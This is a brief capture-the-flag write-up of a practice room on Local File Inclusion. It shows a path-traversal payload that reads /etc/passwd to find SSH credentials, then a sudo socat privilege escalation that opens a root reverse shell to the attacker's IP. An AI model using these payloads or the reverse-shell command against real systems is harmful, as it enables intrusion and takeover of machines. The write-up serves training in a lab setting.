Local File Inclusion
--
The Awesome room for basic understanding of Local File Inclusion
This will be a quick write-up, so let’s get started..
ENUMERATION:-
Clearly port 80 and 22 are open, by diving to 80, various articles are there which are worth read..
Okay so.. after navigating (say LFI-attack), some strange query is in the url
?name=lfiattack This indicates that the website is including information from somewhere else directing us up to a Local File Inclusion attack.
Well, LFI-attacks happens when the input is not sanitised properly.
We saw in the nmap results that port 22 is open, so in the url replace name=lfiattack to name=../../../../../etc/passwd
This means to up to the directory and ending up to root directory.
Hit Ctrl+U and you’ll find the content in nice format along with nice credentials in the end!!!! ;-)
Get Back the machine and ssh to falconfeast
Look around and you’ll get your first flag.
PRIVILEGE ESCALATION
By checkinng current sudo privileges, there’s nice socat sudo access :-)
We’ll now setup the connection to the remote machine i.e our machine.
Run this on attacker machine:- socat file:`tty`, raw, echo-0 tcp-listen:1234
and on falcon run this:- sudo socat tcp-connect:<your_ip>:1234 exec:bash,pty,stderr,setsid,sigint,sane
YES!!! got the root access!!, Look around and answer the second question asked.
That’s all for now!!
Until next time,
Stay Humble always!!
— — — — — — — — — — — — — — -